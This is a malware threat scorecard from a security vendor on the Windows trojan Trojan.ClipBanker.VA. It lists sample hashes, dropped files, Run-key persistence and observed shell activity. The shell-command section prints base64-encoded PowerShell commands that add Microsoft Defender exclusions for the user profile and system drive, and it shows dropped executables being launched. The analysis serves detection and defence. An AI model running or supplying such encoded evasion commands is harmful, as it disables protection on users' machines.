Trojan.ClipBanker.VA
Threat Scorecard
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
See also Threat Assessment Criteria.
| Popularity Rank: | 6,177 |
| Threat Level: | 80 % (High) |
| Infected Computers: | 1,460 |
| First Seen: | September 13, 2021 |
| Last Seen: | April 17, 2026 |
| OS(es) Affected: | Windows |
Table of Contents
Analysis Report
General information
| Family Name: | Trojan.ClipBanker.VA |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
d074b8105f3cfb73a4cba5c6f81b721f
SHA1:
bee8f717c037f0e10636a0d2d94b3709c296a33f
SHA256:
CBF012A39CCE7B310060BDF9E83EADD70D68B8F5C6372ADC780594AAD28C7E9C
File Size:
597.50 KB, 597504 bytes
|
|
MD5:
db554d8112be97e51d380aa1d2e9caff
SHA1:
81cf54be83b2ee85c0f66be95c3dd4bd67eed00a
SHA256:
A4709844B0F3C5AB7A1DF0CEAACAE58368950D89188E9F1BA8F62E8FF5627E93
File Size:
4.95 MB, 4948480 bytes
|
|
MD5:
d319034bd1e93147a1a7fee39bd8efef
SHA1:
d5db70fa0d003e302e697e22569820e98159f2cf
SHA256:
05EDACB20CFC83D970514B1737FF376BF6D22CA2137B79A83F8862371142AABA
File Size:
3.86 MB, 3856384 bytes
|
|
MD5:
3b5865192ea41263be0a78b4d8a7c795
SHA1:
946d09aeb6ad5c0fd13d4bbd24ed08623f84e413
SHA256:
1F5B18D6733E467C7D89B90CD82F4EC287423AB049617B3E1D0DDA246731CE81
File Size:
4.61 KB, 4608 bytes
|
|
MD5:
5c0250fe8ef9d9c7629613b3291bc2f7
SHA1:
114d72ed97bde1880c3108fa8c9721c262bcfb4d
SHA256:
BB6C959DD42A95FD673B89017C29B0F8973257136AC7E6B67130ECD1A322BA39
File Size:
5.11 MB, 5112320 bytes
|
Show More
|
MD5:
5c50e98bd9069ebec62430fd1b950224
SHA1:
d5b557f71ded2dad2b8554bb0fbfc07c686f722c
SHA256:
E42D0139C1AA4E523BF19A41544B79983CA00AADC198850D000D604091EF1262
File Size:
6.91 MB, 6913024 bytes
|
|
MD5:
067966556e298017a6b9d81f5557fcc7
SHA1:
4c2f9510073e48f7a6099c585f64a74a7193c474
SHA256:
4B1A7381C6C41622D06A8CD7595D1EBB64F6DAB0A92F7FE3EB5C05A02AEFF379
File Size:
5.63 KB, 5632 bytes
|
|
MD5:
7c92dc274a841225f5365fe2b652d1bd
SHA1:
c883512403289967dc36a3b42e542bb143964edf
SHA256:
866AAB0D5686C8472B7F66EAE04C9ADC65E0905AC2AD753846DC1F51CB8A3D1D
File Size:
4.97 MB, 4968960 bytes
|
|
MD5:
3952bc52ce739ce187376c7c3676890d
SHA1:
f298e3fb9785b8183656c6eb234b79baba4c932e
SHA256:
314AF32AC8F51A80EC296C6385B98B271F59DC6F62B9C26BB2E6E3114A7E27C3
File Size:
2.88 MB, 2882048 bytes
|
|
MD5:
11ebdd9aca574d84df203b50d6043016
SHA1:
4d254f14113d88e10eb561761f3a174ce9d45188
SHA256:
59A9D8229077F15022FDE78FD4F85DEB678C2988E753DC2D94D0A7C2955C30D7
File Size:
3.98 MB, 3977728 bytes
|
|
MD5:
865f03a25ebd95cd7265925830637d1e
SHA1:
e306986287b6c86ee57664c316fc9e4fc126724f
SHA256:
264B727825F695359C76F9557EE76583FFB2480436ECF2ADB2FA3A579103268E
File Size:
5.12 KB, 5120 bytes
|
|
MD5:
35c421bc5abe4c91fb1279199e01ee39
SHA1:
06c18196aa5893001230f899c373d65df6bd5444
SHA256:
6DCA97E2018AC963F5D52FC3B1DF44F6B7CF81EDF0A97ABB1A96A61A3A00919E
File Size:
5.12 KB, 5120 bytes
|
|
MD5:
f98e07af6457d92759751cdd95696e6a
SHA1:
394fec1c983a5173289722eb14358a1eeab16255
SHA256:
E319B8275B4597CC816AF066F0F80873AC9F0D95FBCED487093EECBEC9080682
File Size:
1.65 MB, 1647162 bytes
|
|
MD5:
5933a3a60f512aa73aa722a2948a4e8a
SHA1:
aadb9bf5df1fd609c30394f469b829d2ad0dc937
SHA256:
49D08802E297EBA82CE35AB694B23F6EDDC346EADA6164A4357C7849155B689B
File Size:
4.61 KB, 4608 bytes
|
|
MD5:
61397890ebceb654c7825ae932317a58
SHA1:
a6223691375d4683bac249b8e6ad6c6a4ec198aa
SHA256:
82A6F2F42016F287A82128267353B3FE6F45B7CD35D2EBCAFC022037732BDE5E
File Size:
274.43 KB, 274432 bytes
|
|
MD5:
20eab47b2ffb0d746224d9d3ad8befc6
SHA1:
678c8f91a930cf298a0224c6078c044300e8b04b
SHA256:
C6201A44444FF8FA3BDA29301B5E8951FB7648A64B83727A177FB7505062622B
File Size:
400.90 KB, 400896 bytes
|
|
MD5:
3b75cb83a454229c6f184f4b917c5601
SHA1:
b4df6adf5d379ae1325c3b53a102213ba002dfa0
SHA256:
F49921EABE793A140E2CE96356F3963738BD93E1E68392066F41471E080F86BD
File Size:
3.25 MB, 3245056 bytes
|
|
MD5:
734696e908927926f0649a09ea312316
SHA1:
2c09d5bfe2fe3f427f79b1ed518a9d2d3ff888cc
SHA256:
7F4AF6A07A372348FD335C6CEBDCDABCF93B8BE95F4A148BFFA5792E532F08E4
File Size:
2.12 MB, 2124288 bytes
|
|
MD5:
6faa93d2dc8b30d5d79441748722ae23
SHA1:
fec1abec1aa58c7c5d134947207d8f30888e5d3f
SHA256:
3084109427E6F69462A643AFDFD441D997DAB7252154F6BD4393B5DC558DA3C6
File Size:
4.08 MB, 4077568 bytes
|
|
MD5:
b819b1472bc54945ce528dfbec15ef8c
SHA1:
e344a2ff2c2872b58b05cdcb2e3a0f5e3dcb1ff7
SHA256:
BA330C5A968A5C9D3059BD8F48327FD0E011AA15EA0BA5F7891C248D9B9FAF53
File Size:
670.72 KB, 670720 bytes
|
|
MD5:
5257cee793739b7aa2bebe35ef572a5c
SHA1:
9c9aaffd64aba6fc084cdb989bf87f71a3d32e37
SHA256:
1C51CE0C3EE4CFED08079E40F744EE1F961034993C2DCE5F446838C605D3CCA2
File Size:
1.18 MB, 1182720 bytes
|
|
MD5:
f847cd9e0e3018581031fc5caf6f066b
SHA1:
a9923f80e6189e29a6c93fe1967443e8457128f9
SHA256:
7C43382483C028D6E944A7061F2615E5650357DD87956C2265657CC5DEB790A4
File Size:
1.40 MB, 1402880 bytes
|
|
MD5:
2bcf3f62313588212933d1ad051fd282
SHA1:
0f1d6b9cb2e61c4cdf2c10ca23941c407b0b308c
SHA256:
CCFBED578FC36050338134AF7A23C452DFF87C23FD3D6C64B43B39EF44265DC6
File Size:
3.03 MB, 3031040 bytes
|
|
MD5:
40a31d73942ec084e3201c8b9be17069
SHA1:
527c6f8b53de92f3af393f58021aabb78714ae89
SHA256:
6FFD1B8B7C4912B4FB0BDB1437371A1E761854092FB0C3E4934D32E9A30D9F38
File Size:
75.78 KB, 75776 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have resources
- File doesn't have security information
- File has been packed
- File has TLS information
- File is 32-bit executable
- File is either console or GUI application
Show More
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.Windows PE Version Information
Windows PE Version Information
This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.| Name | Value |
|---|---|
| Company Name | XenoUI |
| File Description | XenoUI |
| File Title | XenoUI.dll |
| File Version |
|
| Internal Name | TJprojMain |
| Legal Copyright | Rizve |
| Original Filename | TJprojMain.exe |
| Product Name |
|
| Product Version |
|
File Traits
- fptable
- HighEntropy
- No Version Info
- packed
- x86
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 8 |
|---|---|
| Potentially Malicious Blocks: | 7 |
| Whitelisted Blocks: | 1 |
| Unknown Blocks: | 0 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- ClipBanker.VA
- Dapato.AL
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\dav rpc service | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| \device\namedpipe\pshost.134063647683626032.4408.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134063647684630716.5644.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134066643681019175.2956.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134071580881195168.3876.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134087998441205982.7828.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134098748388717683.8660.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134104082697386674.4024.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134122556483075982.508.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134145088444479320.6440.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
Show More
| \device\namedpipe\pshost.134211145868314600.3116.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\wkssvc | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\5e4d.tmp\5e6d.tmp\5e8e.bat | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_1xt0dixy.za5.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_2gdnme25.egk.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_2gy13yri.kcj.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_33j5bdjo.gsu.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_3figtrjf.p55.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_5nfly1x0.hog.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_5omayrkh.4o0.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_bkezoo24.5y2.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_bowk4wif.uah.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_eos0gqc3.slc.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_essqzfri.5l1.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_i1g1rogr.1qs.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_iasdahex.2yt.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ngnvm5z4.03g.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_p2s55xk5.ayc.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_pn3vo2mc.xbr.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_qjffutxs.1na.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_s0trlcam.fda.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_seydvbqx.aqa.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_slktxzoa.vwo.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_vcnfnh5i.iko.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_vxv1egut.0eo.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\compiler.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\file.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\immortal free1.2.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\immortal.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\imx free.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\licensevalidator\license.txt | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\licensevalidator\main.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\miner.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\painel pago.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\rayd cheat.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\refrech3.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\securyt.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\vison free.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\xenouiconfig.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\monotone.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\registry.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\smartscreen.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\subdir.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\svchost.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\system.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\trashcrack.exe | Generic Write,Read Attributes |
| c:\users\user\downloads\xeno.exe | Generic Write,Read Attributes |
| c:\windows\vison free.exe | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Data | API Name |
|---|---|---|
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 塟憀䨭ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ꗓ憎䨭ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 앋磫兤ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 뮚縧冂ǜ | RegNtPreCreateKey |
Show More
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ✢繋冂ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 缊冂ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::enablefiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::filetracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::consoletracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::maxfilesize | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasapi32::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasmancs::enablefiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::filetracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::consoletracingmask | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::maxfilesize | RegNtPreCreateKey | |
| HKLM\software\microsoft\tracing\rasmancs::filedirectory | %windir%\tracing | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 㣗䳦ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 蕺恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 뮖ﰺ恒ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 㵛 ȁ 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㯟ﳾ恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 꾺ﴲ恒ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 㠕ﵛ恒ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ␂標ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 鰀 ȁ 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 滳ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ➑翁ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 渟䤣鐿ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 붶穪큓ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\run::registry | C:\Users\Xcqunmbw\AppData\Roaming\Registry.exe | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\run::smartscreen | C:\Users\Xcqunmbw\AppData\Roaming\smartscreen.exe | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Process Shell Execute |
|
| Syscall Use |
Show More
31 additional items are not displayed above. |
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Encryption Used |
|
| Other Suspicious |
|
| Network Winsock2 |
|
| Network Winsock |
|
| Network Icmp |
|
| Network Winhttp |
|
| Network Info Queried |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
open powershell -EncodedCommand "PAAjAHgAZwBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAcgBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATQBpAHMAcwBpAG4AZwAgAEQATABMACAAKABkAGIAZABnAHkAYQB0AC4AZABsAGwAKQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAeABhAG0AIwA+AA=="
|
open powershell -EncodedCommand "PAAjAGoAegBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAbQBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeQBzACMAPgA="
|
open C:\Users\Pvgviwwm\AppData\Local\Temp\Compiler.exe
|
C:\Users\Wcypxflh\AppData\Local\Temp\File.exe (NULL)
|
open powershell -EncodedCommand "PAAjAG0AcAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAYwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZgBmACMAPgA="
|
Show More
open C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe
|
open C:\Users\Xrgzroxm\AppData\Local\Temp\Compiler.exe
|
"C:\WINDOWS\system32\cmd" /c "\5E4D.tmp\5E6D.tmp\5E8E.bat C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe"
|
C:\WINDOWS\system32\mode.com mode 80,20
|
WriteConsole: Access is denied
|
WriteConsole: e295a0e29590e295ace29590e295a320
|
WriteConsole: Your unique sess
|
WriteConsole:
|
WriteConsole: 4502-29797-8010
|
C:\WINDOWS\system32\PING.EXE ping localhost
|
WriteConsole: 'colorecho-vc10-
|
WriteConsole: Coded by
|
WriteConsole:
|
WriteConsole: If this doesn
|
WriteConsole: Contact
|
WriteConsole: This i
|
WriteConsole: 'Button' is not
|
WriteConsole: 'GetInput' is no
|
open C:\Users\Mryehchx\AppData\Local\Temp\PAINEL PAGO.exe
|
open powershell -EncodedCommand "PAAjAGYAaABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYQBuACMAPgA="
|
open C:\Users\Cmpflbeo\AppData\Local\Temp\miner.exe
|
open C:\Users\Cmpflbeo\AppData\Roaming\TrashCrack.exe
|
open C:\Users\Qjkbpfsl\AppData\Local\Temp\IMMORTAL FREE1.2.exe
|
open Xeno.exe
|
open C:\Users\Wzrhnfss\AppData\Local\Temp\xenoUIConfig.exe
|
C:\Users\Wzrhnfss\AppData\Local\Temp\LicenseValidator\main.exe (NULL)
|
